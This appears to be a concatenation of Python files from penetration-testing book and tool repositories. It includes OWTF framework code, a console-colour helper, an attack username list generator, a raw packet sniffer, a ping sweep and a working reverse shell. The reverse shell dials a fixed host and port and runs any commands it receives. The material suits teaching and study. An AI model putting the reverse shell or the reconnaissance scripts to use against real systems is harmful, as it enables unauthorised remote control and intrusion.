JWT_EXP_DELTA_SECONDS = 60 * 60 * 24
JWT_OPTIONS = {
    "verify_signature": True,
    "verify_exp": True,
    "verify_nbf": False,
    "verify_iat": True,
    "verify_aud": False,
}
| 32.111111 | 114 | 0.682003 |
owtf | #!/usr/bin/env python
from six import iteritems
import os
import yaml
import yamlordereddictloader
# ANSI escape codes used for colored console output.
BLUE = "\033[94m"
GREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
RESET = "\033[0m"
CURR_DIR = os.path.dirname(os.path.realpath(__file__))
OWTF_CONF = os.path.join(os.path.expanduser("~"), ".owtf")
# Load the tool manifest at import time; yamlordereddictloader preserves the
# declaration order of the tools in tools.yaml.
with open(os.path.join(CURR_DIR, "tools.yaml"), "r") as f:
    conf = yaml.load(f, Loader=yamlordereddictloader.Loader)
def create_directory(directory):
    """Create parent directories as necessary.

    :param directory: (~str) Path of directory to be made.
    :return: True - if directory is created (or already exists empty),
             False - if it exists and is non-empty.
    """
    try:
        os.makedirs(directory)
    except OSError:
        # Creation failed (typically: already exists). An empty existing
        # directory still counts as success for the installer.
        return not os.listdir(directory)
    return True
def install_in_directory(directory, command):
    """Execute a certain command while staying inside one directory.

    :param directory: (~str) Path of directory in which installation command has to be executed.
    :param command: (~str) Linux shell command (most likely `wget` here)
    :return: None; skips the install when the directory already has contents.
    """
    if not create_directory(directory):
        # Non-empty directory: assume the tool is already installed.
        print(WARNING + "[!] Directory {} already exists, so skipping installation for this".format(directory) + RESET)
        return
    print(BLUE + "[*] Switching to {}".format(directory) + RESET)
    os.chdir(directory)
    os.system(command)
def parse_and_install():
    """Run every tool entry from tools.yaml: each has a `command` to execute
    inside its `directory` (created under ~/.owtf as needed)."""
    for k, v in iteritems(conf):
        cmd = v["command"]
        directory = os.path.join(OWTF_CONF, v["directory"])
        print(BLUE + "[*] Running {0} in {1}".format(cmd, directory) + RESET)
        install_in_directory(directory, cmd)
if __name__ == "__main__":
    parse_and_install()
| 28.444444 | 119 | 0.649407 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
    """Windows console color indices (values match wincon.h)."""
    BLACK = 0
    BLUE = 1
    GREEN = 2
    CYAN = 3
    RED = 4
    MAGENTA = 5
    YELLOW = 6
    GREY = 7
# from wincon.h
class WinStyle(object):
    """Console attribute style bits: BRIGHT sets the text-intensity bit,
    BRIGHT_BACKGROUND the background-intensity bit."""
    NORMAL = 0x00  # dim text, dim background
    BRIGHT = 0x08  # bright text, dim background
    BRIGHT_BACKGROUND = 0x80  # dim text, bright background
class WinTerm(object):
    """Tracks and applies Windows console text attributes (foreground,
    background, style) via the win32 console API, emulating the effects of
    ANSI escape sequences."""

    def __init__(self):
        # Capture the console's startup attributes so reset_all can restore them.
        self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
        self.set_attrs(self._default)
        self._default_fore = self._fore
        self._default_back = self._back
        self._default_style = self._style
        # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
        # So that LIGHT_EX colors and BRIGHT style do not clobber each other,
        # we track them separately, since LIGHT_EX is overwritten by Fore/Back
        # and BRIGHT is overwritten by Style codes.
        self._light = 0
    def get_attrs(self):
        # Attribute word layout: low 3 bits foreground, next 4 bits background,
        # style/intensity bits on top.
        return self._fore + self._back * 16 + (self._style | self._light)
    def set_attrs(self, value):
        # Inverse of get_attrs: split an attribute word into fore/back/style.
        self._fore = value & 7
        self._back = (value >> 4) & 7
        self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
    def reset_all(self, on_stderr=None):
        """Restore the attributes captured at construction time."""
        self.set_attrs(self._default)
        self.set_console(attrs=self._default)
    def fore(self, fore=None, light=False, on_stderr=False):
        """Set the foreground color (None restores the default)."""
        if fore is None:
            fore = self._default_fore
        self._fore = fore
        # Emulate LIGHT_EX with BRIGHT Style
        if light:
            self._light |= WinStyle.BRIGHT
        else:
            self._light &= ~WinStyle.BRIGHT
        self.set_console(on_stderr=on_stderr)
    def back(self, back=None, light=False, on_stderr=False):
        """Set the background color (None restores the default)."""
        if back is None:
            back = self._default_back
        self._back = back
        # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
        if light:
            self._light |= WinStyle.BRIGHT_BACKGROUND
        else:
            self._light &= ~WinStyle.BRIGHT_BACKGROUND
        self.set_console(on_stderr=on_stderr)
    def style(self, style=None, on_stderr=False):
        """Set the style bits (None restores the default)."""
        if style is None:
            style = self._default_style
        self._style = style
        self.set_console(on_stderr=on_stderr)
    def set_console(self, attrs=None, on_stderr=False):
        """Push the tracked (or given) attributes to the console handle."""
        if attrs is None:
            attrs = self.get_attrs()
        handle = win32.STDOUT
        if on_stderr:
            handle = win32.STDERR
        win32.SetConsoleTextAttribute(handle, attrs)
    def get_position(self, handle):
        position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
        # Because Windows coordinates are 0-based,
        # and win32.SetConsoleCursorPosition expects 1-based.
        position.X += 1
        position.Y += 1
        return position
    def set_cursor_position(self, position=None, on_stderr=False):
        """Move the cursor to an absolute (1-based) position."""
        if position is None:
            # I'm not currently tracking the position, so there is no default.
            # position = self.get_position()
            return
        handle = win32.STDOUT
        if on_stderr:
            handle = win32.STDERR
        win32.SetConsoleCursorPosition(handle, position)
    def cursor_adjust(self, x, y, on_stderr=False):
        """Move the cursor relative to its current position."""
        handle = win32.STDOUT
        if on_stderr:
            handle = win32.STDERR
        position = self.get_position(handle)
        adjusted_position = (position.Y + y, position.X + x)
        win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
    def erase_screen(self, mode=0, on_stderr=False):
        # 0 should clear from the cursor to the end of the screen.
        # 1 should clear from the cursor to the beginning of the screen.
        # 2 should clear the entire screen, and move cursor to (1,1)
        handle = win32.STDOUT
        if on_stderr:
            handle = win32.STDERR
        csbi = win32.GetConsoleScreenBufferInfo(handle)
        # get the number of character cells in the current buffer
        cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
        # get number of character cells before current cursor position
        cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
        if mode == 0:
            from_coord = csbi.dwCursorPosition
            cells_to_erase = cells_in_screen - cells_before_cursor
        if mode == 1:
            from_coord = win32.COORD(0, 0)
            cells_to_erase = cells_before_cursor
        elif mode == 2:
            from_coord = win32.COORD(0, 0)
            cells_to_erase = cells_in_screen
        # fill the entire screen with blanks
        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
        # now set the buffer's attributes accordingly
        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
        if mode == 2:
            # put the cursor where needed
            win32.SetConsoleCursorPosition(handle, (1, 1))
    def erase_line(self, mode=0, on_stderr=False):
        # 0 should clear from the cursor to the end of the line.
        # 1 should clear from the cursor to the beginning of the line.
        # 2 should clear the entire line.
        handle = win32.STDOUT
        if on_stderr:
            handle = win32.STDERR
        csbi = win32.GetConsoleScreenBufferInfo(handle)
        if mode == 0:
            from_coord = csbi.dwCursorPosition
            cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
        if mode == 1:
            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
            cells_to_erase = csbi.dwCursorPosition.X
        elif mode == 2:
            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
            cells_to_erase = csbi.dwSize.X
        # fill the entire screen with blanks
        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
        # now set the buffer's attributes accordingly
        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
    def set_title(self, title):
        """Set the console window title."""
        win32.SetConsoleTitle(title)
| 37.595092 | 95 | 0.615262 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher S. Duffy
Date: March 2015
Name: username_generator.py
Purpose: To generate a username list from the US Census Top 1000 surnames and other lists
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from collections import namedtuple
import string
import argparse
import os
try:
import xlrd
except:
sys.exit("[!] Please install the xlrd library: pip install xlrd")
def unique_list(list_sort, verbose):
    """Return the items of *list_sort* with duplicates removed, preserving
    first-seen order.

    Replaces the original O(n^2) ``noted.count(item)`` scan with an O(n)
    seen-set (items here are username strings, which are hashable).

    :param list_sort: iterable of hashable items (usernames).
    :param verbose: verbosity level; > 0 prints a progress note.
    :return: new list with duplicates dropped, order preserved.
    """
    if verbose > 0:
        print("[*] Removing duplicates while maintaining order")
    seen = set()
    noted = []
    for item in list_sort:
        if item not in seen:
            seen.add(item)
            noted.append(item)
    return noted
def census_parser(filename, verbose):
    """Parse the US Census "Top1000" surnames spreadsheet and build username
    candidates of the form <initial><surname> (e.g. 'asmith').

    :param filename: path to the Top1000.xls census workbook.
    :param verbose: verbosity level; > 1 prints header-elimination notes.
    :return: (surname_dict, username_dict, username_list) where username_list
             is sorted by census rank.
    """
    # Create the named tuple
    CensusTuple = namedtuple('Census', 'name, rank, count, prop100k, cum_prop100k, pctwhite, pctblack, pctapi, pctaian, pct2prace, pcthispanic')
    # Define the location of the file and worksheet till arguments are developed
    worksheet_name = "top1000"
    #Define work book and work sheet variables
    workbook = xlrd.open_workbook(filename)
    spreadsheet = workbook.sheet_by_name(worksheet_name)
    total_rows = spreadsheet.nrows - 1
    # NOTE(review): starting at -1 makes the first spreadsheet.row() call read
    # the last row before the counter is incremented — confirm this is
    # intentional (the "." rank check below filters non-data rows anyway).
    current_row = -1
    # Define holder for details
    username_dict = {}
    surname_dict = {}
    alphabet = list(string.ascii_lowercase)
    while current_row < total_rows:
        row = spreadsheet.row(current_row)
        current_row += 1
        entry = CensusTuple(*tuple(row)) #Passing the values of the row as a tuple into the namedtuple
        surname_dict[entry.rank] = entry
        cellname = entry.name
        cellrank = entry.rank
        for letter in alphabet:
            # Data rows have float ranks like "1.0"; header rows don't contain
            # a dot and are skipped.
            if "." not in str(cellrank.value):
                if verbose > 1:
                    print("[-] Eliminating table headers")
                break
            username = letter + str(cellname.value.lower())
            rank = str(cellrank.value)
            username_dict[username] = rank
    # NOTE(review): ranks are compared as strings here, so ordering is
    # lexicographic (e.g. "10.0" < "2.0") — confirm if numeric order matters.
    username_list = sorted(username_dict, key=lambda key: username_dict[key])
    return(surname_dict, username_dict, username_list)
def username_file_parser(prepend_file, append_file, verbose):
    """Load a supplemental username list from disk.

    Exactly one of *prepend_file* / *append_file* should be given; which one
    is set decides whether the entries are later merged at the beginning or
    the end of the census-generated list.

    :param prepend_file: filename to prepend, or a false value.
    :param append_file: filename to append, or a false value.
    :param verbose: verbosity level; > 1 prints how many entries were read.
    :return: (lines, put_where) with put_where one of "begin" / "end".
    """
    if prepend_file:
        put_where = "begin"
        filename = prepend_file
    elif append_file:
        put_where = "end"
        filename = append_file
    else:
        sys.exit("[!] There was an error in processing the supplemental username list!")
    with open(filename) as source:
        lines = [line.rstrip('\n') for line in source]
    if verbose > 1:
        # Bug fix: the '%' operand originally sat OUTSIDE print(...), which
        # raises TypeError on Python 3 (None % tuple). Moving it inside the
        # call produces the same output on Python 2.
        if "end" in put_where:
            print("[*] Appending %d entries to the username list" % (len(lines)))
        else:
            print("[*] Prepending %d entries to the username list" % (len(lines)))
    return(lines, put_where)
def combine_usernames(supplemental_list, put_where, username_list, verbose):
    """Splice the supplemental usernames into *username_list* (in place) and
    return the de-duplicated result.

    :param supplemental_list: usernames loaded from the user-supplied file.
    :param put_where: "begin" to prepend, "end" to append (substring match).
    :param username_list: census-derived usernames; mutated in place.
    :param verbose: passed through to unique_list.
    :return: de-duplicated, order-preserving combined list.
    """
    if "begin" in put_where:
        # In-place slice assignment keeps the caller's list object.
        username_list[:0] = supplemental_list
    if "end" in put_where:
        username_list.extend(supplemental_list)
    return unique_list(username_list, verbose)
def write_username_file(username_list, filename, domain, verbose):
    """Write the usernames to *filename*, one per line; when *domain* is set,
    also write "<filename>_<domain>" containing user@domain addresses.

    :param username_list: final list of usernames to persist.
    :param filename: output path for the plain username list.
    :param domain: optional e-mail domain for the companion list.
    :param verbose: verbosity level; > 1 prints the output paths.
    """
    if verbose > 1:
        # Bug fix: '%' moved inside print() — the original form is a
        # TypeError on Python 3 (None % value); output is unchanged on py2.
        print("[*] Writing to %s" % (filename))
    with open(filename, 'w') as out:
        out.write('\n'.join(username_list))
    if domain:
        domain_filename = filename + "_" + domain
        if verbose > 1:
            print("[*] Writing domain supported list to %s" % (domain_filename))
        email_list = [line + "@" + domain for line in username_list]
        with open(domain_filename, 'w') as out:
            out.write('\n'.join(email_list))
    return
if __name__ == '__main__':
    # If script is executed at the CLI
    usage = '''usage: %(prog)s [-c census.xlsx] [-f output_filename] [-a append_filename] [-p prepend_filename] [-d domain_name] -q -v -vv -vvv'''
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-c", "--census", type=str, help="The census file that will be used to create usernames, this can be retrieved like so:\n wget http://www2.census.gov/topics/genealogy/2000surnames/Top1000.xls", action="store", dest="census_file")
    parser.add_argument("-f", "--filename", type=str, help="Filename for output the usernames", action="store", dest="filename")
    parser.add_argument("-a","--append", type=str, action="store", help="A username list to append to the list generated from the census", dest="append_file")
    parser.add_argument("-p","--prepend", type=str, action="store", help="A username list to prepend to the list generated from the census", dest="prepend_file")
    parser.add_argument("-d","--domain", type=str, action="store", help="The domain to append to usernames", dest="domain_name")
    parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
    parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
    parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
    args = parser.parse_args()
    # Set Constructors
    census_file = args.census_file  # Census spreadsheet path
    filename = args.filename  # Filename for outputs
    verbose = args.verbose  # Verbosity level
    append_file = args.append_file  # Username list appended to the output
    prepend_file = args.prepend_file  # Username list prepended to the output
    domain_name = args.domain_name  # Domain appended to the username list
    dir = os.getcwd()  # Get current working directory
    # Argument Validator
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    if append_file and prepend_file:
        sys.exit("[!] Please select either prepend or append for a file not both")
    if not filename:
        if os.name != "nt":
            filename = dir + "/census_username_list"
        else:
            filename = dir + "\\census_username_list"
    else:
        # Bug fix: the original tested `if "\\" or "/" in filename:` which is
        # always true ("\\" is a truthy string), so relative filenames never
        # had the working directory prepended. Also removed the redundant
        # nested `if filename:` (this branch already guarantees it) and moved
        # '%' inside print() (Python 3 TypeError otherwise).
        if "\\" in filename or "/" in filename:
            if verbose > 1:
                print("[*] Using filename: %s" % (filename))
        else:
            if os.name != "nt":
                filename = dir + "/" + filename
            else:
                filename = dir + "\\" + filename
            if verbose > 1:
                print("[*] Using filename: %s" % (filename))
    # Define working variables
    sur_dict = {}
    user_dict = {}
    user_list = []
    sup_username = []
    target = []
    combined_users = []
    # Process census file
    if not census_file:
        sys.exit("[!] You did not provide a census file!")
    else:
        sur_dict, user_dict, user_list = census_parser(census_file, verbose)
    # Process supplemental username file
    if append_file or prepend_file:
        sup_username, target = username_file_parser(prepend_file, append_file, verbose)
        combined_users = combine_usernames(sup_username, target, user_list, verbose)
    else:
        combined_users = user_list
    write_username_file(combined_users, filename, domain_name, verbose)
| 43.00995 | 253 | 0.660373 |
owtf | """
owtf.lib.owtf_process
~~~~~~~~~~~~~~~~~~~~~
Consists of owtf process class and its manager
"""
from multiprocessing import Process, Queue
from owtf.db.session import get_scoped_session
from owtf.utils.error import setup_signal_handlers
from owtf.plugin.runner import runner
from owtf.utils.logger import OWTFLogger
__all__ = ["OWTFProcess"]
class OWTFProcess(Process):
    """
    Implementing own proxy of Process for better control of processes launched
    from OWTF both while creating and terminating the processes
    """
    def __init__(self, **kwargs):
        """
        Ideally not to override this but can be done if needed. If overridden
        please give a call to super() and make sure you run this
        """
        # Queue used to signal this worker; presumably for shutdown requests
        # ("poison pill") — confirm against the worker manager.
        self.poison_q = Queue()
        self._process = None
        self.session = get_scoped_session()
        self.plugin_handler = runner
        self.logger = OWTFLogger()
        setup_signal_handlers()
        for key in list(kwargs.keys()):  # Attach all kwargs to self
            setattr(self, key, kwargs.get(key, None))
        super(OWTFProcess, self).__init__()
    def initialize(self, **kwargs):
        """
        Supposed to be overridden if user wants to initialize something
        """
        pass
    def run(self):
        """This method must not be overridden by user
        Sets proper logger with file handler and Formatter
        and launches process specific code
        :return: None
        :rtype: None
        """
        try:
            self.logger.enable_logging()
            self.pseudo_run()
        except KeyboardInterrupt:
            # In case of interrupt while listing plugins
            pass
    def pseudo_run(self):
        """
        This method must be overridden by user with the process related code
        """
        pass
| 27.123077 | 78 | 0.615764 |
cybersecurity-penetration-testing | import socket
import os
# host to listen on
host = "192.168.0.196"
# create a raw socket and bind it to the public interface
# (raw sockets need admin/root; Windows can capture all IP traffic, while
# Unix raw sockets here are limited to ICMP)
if os.name == "nt":
    socket_protocol = socket.IPPROTO_IP
else:
    socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
# we want the IP headers included in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# if we're on Windows we need to send an IOCTL
# to setup promiscuous mode
if os.name == "nt":
    sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# read in a single packet (Python 2 print statement)
print sniffer.recvfrom(65565)
# if we're on Windows turn off promiscuous mode
if os.name == "nt":
    sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
| 25.225806 | 75 | 0.698276 |
Python-Penetration-Testing-for-Developers | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
# Interactive setup (Python 2): read the /24 network prefix and the host
# range to sweep, then pick the ping flag for the current OS.
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
# Keep the first three octets, e.g. "192.168.0." — the host octet is appended later.
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
dic = collections.OrderedDict()
#dic = collections.OrderedDict()
oper = platform.system()
# Windows ping uses -n for count; Unix-likes use -c.
if (oper=="Windows"):
    ping1 = "ping -n 1 "
elif (oper== "Linux"):
    ping1 = "ping -c 1 "
else :
    ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
    """Worker thread that pings one slice [st, en) of the host range."""
    def __init__(self,st,en):
        threading.Thread.__init__(self)
        self.st = st
        self.en = en
    def run(self):
        run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
    """Ping hosts net2.st1 .. net2.(en1-1); record responders in `dic`."""
    #print "Scanning in Progess"
    for ip in xrange(st1,en1):
        #print ".",
        addr = net2+str(ip)
        comm = ping1+addr
        response = os.popen(comm)
        # A reply line containing "TTL" indicates the host answered.
        # NOTE(review): this matches Windows ping output (uppercase TTL);
        # Linux ping prints lowercase "ttl" — confirm intended platforms.
        for line in response.readlines():
            if(line.count("TTL")):
                break
        if (line.count("TTL")):
            #print addr, "--> Live"
            dic[ip]= addr
''' Section 4 '''
# Split the host range into slices of `tn` addresses, one thread per slice.
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
    for i in xrange(total_thread):
        en = st1+tn
        if(en >en1):
            en =en1
        thread = myThread(st1,en)
        thread.start()
        threads.append(thread)
        st1 =en
except:
    print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
# Wait for every worker to finish before reporting.
for t in threads:
    t.join()
print "Exiting Main Thread"
# Sort responders by host octet for a stable report.
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
    print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.934211 | 60 | 0.660735 |
Python-Penetration-Testing-Cookbook | import pyshark
# Capture live HTTP traffic (TCP port 80) on interface en0 for 5 seconds.
cap = pyshark.LiveCapture(interface='en0', bpf_filter='ip and tcp port 80')
cap.sniff(timeout=5)
# Print the top protocol layer of each captured packet.
for pkt in cap:
print(pkt.highest_layer) | 21.285714 | 75 | 0.748387 |
cybersecurity-penetration-testing | import socket
import subprocess
import sys
import time
HOST = '172.16.0.2'    # Your attacking machine to connect back to
PORT = 4444            # The port your attacking machine is listening on
# Python 2-only tuple-parameter syntax; open a TCP connection back to the
# listener and return the connected socket.
def connect((host, port)):
    go = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    go.connect((host, port))
    return go
def wait(go):
    """Receive one command on socket `go`, execute it via the shell, and send
    back combined stdout+stderr. Returns True when the peer disconnected
    (empty read), False otherwise; exits the process on "exit"."""
    data = go.recv(1024)
    if data == "exit\n":
        go.close()
        sys.exit(0)
    elif len(data)==0:
        # Zero-length read: connection dropped; signal the caller to reconnect.
        return True
    else:
        # shell=True executes the raw received string — this is the intended
        # remote-shell behavior of this payload.
        p = subprocess.Popen(data, shell=True,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            stdin=subprocess.PIPE)
        stdout = p.stdout.read() + p.stderr.read()
        go.send(stdout)
        return False
def main():
    """Reconnect loop: dial the listener, serve commands until the connection
    dies, then retry every 2 seconds."""
    while True:
        dead=False
        try:
            go=connect((HOST,PORT))
            while not dead:
                dead=wait(go)
            go.close()
        except socket.error:
            # Listener unreachable: swallow and retry after the sleep below.
            pass
        time.sleep(2)
if __name__ == "__main__":
    sys.exit(main())
| 22.372093 | 72 | 0.563745 |
owtf | """
owtf.api.handlers.base
~~~~~~~~~~~~~~~~~~~~~~
"""
import json
import re
import uuid
from tornado.escape import url_escape
from tornado.web import RequestHandler
from owtf import __version__
from owtf.db.session import Session, get_db_engine
from owtf.lib.exceptions import APIError
from owtf.settings import (
SERVER_PORT,
FILE_SERVER_PORT,
USE_SENTRY,
SERVER_ADDR,
SESSION_COOKIE_NAME,
)
from owtf.utils.strings import utf8
# If the Sentry raven library is around, pull in SentryMixin so handlers can
# report exceptions to Sentry when USE_SENTRY is enabled.
try:
    from raven.contrib.tornado import SentryMixin
except ImportError:
    # raven is optional: fall back to plain handlers even when USE_SENTRY is
    # set (the original code raised NameError on `SentryHandler` below when
    # raven was missing but USE_SENTRY was truthy).
    SentryMixin = None
else:

    class SentryHandler(SentryMixin, RequestHandler):
        pass


if USE_SENTRY and SentryMixin is not None:
    RequestHandler = SentryHandler
__all__ = ["APIRequestHandler", "FileRedirectHandler", "UIRequestHandler"]
# pattern for the authentication token header
auth_header_pat = re.compile(r"^(?:token|bearer)\s+([^\s]+)$", flags=re.IGNORECASE)
class BaseRequestHandler(RequestHandler):
    """Common base for all OWTF handlers: stamps every response with the
    standard security and cache-busting headers."""

    # (header, value) pairs applied to every outgoing response, in order.
    _DEFAULT_HEADERS = (
        ("X-OWTF-Version", __version__),
        ("X-Frame-Options", "SAMEORIGIN"),
        ("X-XSS-Protection", "1; mode=block"),
        ("X-Content-Type-Options", "nosniff"),
        ("Referrer-Policy", "strict-origin-when-cross-origin"),
        ("Cache-Control", "no-cache,no-store,max-age=0,must-revalidate"),
        ("Pragma", "no-cache"),
        ("Expires", "-1"),
    )

    def set_default_headers(self):
        """Attach the standard header set to the outgoing response."""
        for header_name, header_value in self._DEFAULT_HEADERS:
            self.add_header(header_name, header_value)
class APIRequestHandler(BaseRequestHandler):
    """Base class for JSON API handlers.

    Wraps every response in a JSend-style envelope ({"status": ...,
    "data"/"message": ...}) and manages a per-request database session.
    """

    def initialize(self):
        """Open a request-scoped DB session and force a JSON content type."""
        Session.configure(bind=get_db_engine())
        self.session = Session()
        # Decode byte strings and turn them into character (Unicode) strings.
        self.request.arguments = {
            key: [value.decode("utf8") for value in value_list] for key, value_list in self.request.arguments.items()
        }
        self.set_header("Content-Type", "application/json")

    def on_finish(self):
        """Release the request-scoped DB session."""
        self.session.close()

    def write(self, chunk):
        """Write a response chunk.

        Tornado refuses to write a bare top-level list (JSON-hijacking
        protection), so serialize lists explicitly before handing them over.
        """
        if isinstance(chunk, list):
            super(APIRequestHandler, self).write(json.dumps(chunk))
        else:
            super(APIRequestHandler, self).write(chunk)

    def success(self, data):
        """When an API call is successful, the JSend object is used as a simple
        envelope for the results, using the data key.

        :type data: A JSON-serializable object
        :param data: Acts as the wrapper for any data returned by the API
            call. If the call returns no data, data should be set to null.
        """
        self.write({"status": "success", "data": data})
        self.finish()

    def fail(self, data):
        """There was a problem with the data submitted, or some pre-condition
        of the API call wasn't satisfied.

        :type data: A JSON-serializable object
        :param data: Provides the wrapper for the details of why the request
            failed. If the reasons for failure correspond to POST values,
            the response object's keys SHOULD correspond to those POST values.
        """
        self.write({"status": "fail", "data": data})
        self.finish()

    def error(self, message, data=None, code=None):
        """An error occurred in processing the request, i.e. an exception was
        thrown.

        :type data: A JSON-serializable object
        :param data: A generic container for any other information about the
            error, i.e. the conditions that caused the error,
            stack traces, etc.
        :type message: A JSON-serializable object
        :param message: A meaningful, end-user-readable (or at the least
            log-worthy) message, explaining what went wrong
        :type code: int
        :param code: A numeric code corresponding to the error, if applicable
        """
        result = {"status": "error", "message": message}
        if data:
            result["data"] = data
        if code:
            result["code"] = code
        self.write(result)
        self.finish()

    def write_error(self, status_code, **kwargs):
        """Override of RequestHandler.write_error.

        Emits a JSend "fail" envelope: APIError instances get a bare
        {"status", "data"} body, everything else also carries the HTTP
        reason and status code.

        :type status_code: int
        :param status_code: HTTP status code
        """

        def get_exc_message(exception):
            return exception.log_message if hasattr(exception, "log_message") else str(exception)

        self.clear()
        self.set_status(status_code)
        # BUG FIX: the exception used to be run through utf8() *before* the
        # isinstance() check below, so it was always a bytes object and the
        # APIError branch was unreachable. Keep the exception object itself.
        try:
            exception = kwargs["exc_info"][1]
        except (KeyError, IndexError):
            exception = None
        if isinstance(exception, APIError):
            self.write({"status": "fail", "data": get_exc_message(exception)})
            self.finish()
        else:
            self.write(
                {
                    "status": "fail",
                    "message": self._reason,
                    "data": get_exc_message(exception),
                    "code": status_code,
                }
            )
            self.finish()

    def get_auth_token(self):
        """Get the authorization token from the Authorization header."""
        auth_header = self.request.headers.get("Authorization", "")
        match = auth_header_pat.match(auth_header)
        if not match:
            return None
        return match.group(1)
class UIRequestHandler(BaseRequestHandler):
    """Base class for handlers that render the web UI and manage cookies."""

    def reverse_url(self, name, *args):
        """Build a URL for a named route, stripping the artifacts tornado
        leaves behind for optional arguments ("?" and a trailing "None")."""
        raw_url = super(UIRequestHandler, self).reverse_url(name, *args)
        return raw_url.replace("?", "").split("None")[0]

    def _set_cookie(self, key, value, encrypted=True, **overrides):
        """Setting any cookie should go through here.

        Uses tornado's set_secure_cookie when `encrypted` is true, otherwise
        sets a plaintext cookie. Keyword overrides win over the defaults
        computed here.
        """
        # tornado <4.2 have a bug that consider secure==True as soon as
        # 'secure' kwarg is passed to set_secure_cookie, so only pass it when
        # the request really came in over HTTPS.
        cookie_kwargs = {"httponly": True}
        if self.request.protocol == "https":
            cookie_kwargs["secure"] = True
        cookie_kwargs["domain"] = SERVER_ADDR
        cookie_kwargs.update(overrides)
        setter = self.set_secure_cookie if encrypted else self.set_cookie
        self.application.log.debug("Setting cookie %s: %s", key, cookie_kwargs)
        setter(key, value, **cookie_kwargs)

    def _set_user_cookie(self, user, server):
        """Set the per-user cookie for `server`, scoped to its base URL."""
        self.application.log.debug("Setting cookie for %s: %s", user.name, server.cookie_name)
        self._set_cookie(server.cookie_name, user.cookie_id, encrypted=True, path=server.base_url)

    def get_session_cookie(self):
        """Get the session id from a cookie.

        Returns None if no session id is stored.
        """
        return self.get_cookie(SESSION_COOKIE_NAME, None)

    def set_session_cookie(self):
        """Set a new session id cookie and return the new id.

        The session id cookie is *not* encrypted, so other services on this
        domain can read it.
        """
        fresh_session_id = uuid.uuid4().hex
        self._set_cookie(SESSION_COOKIE_NAME, fresh_session_id, encrypted=False)
        return fresh_session_id

    @property
    def template_context(self):
        """Context dict handed to templates; currently just the current user."""
        return dict(user=self.get_current_user())
class FileRedirectHandler(BaseRequestHandler):
    """Permanently redirect file requests to the dedicated output-file server
    (same host, file-server port instead of the API port)."""

    SUPPORTED_METHODS = ["GET"]

    def get(self, file_url):
        """301-redirect `file_url` to the file server."""
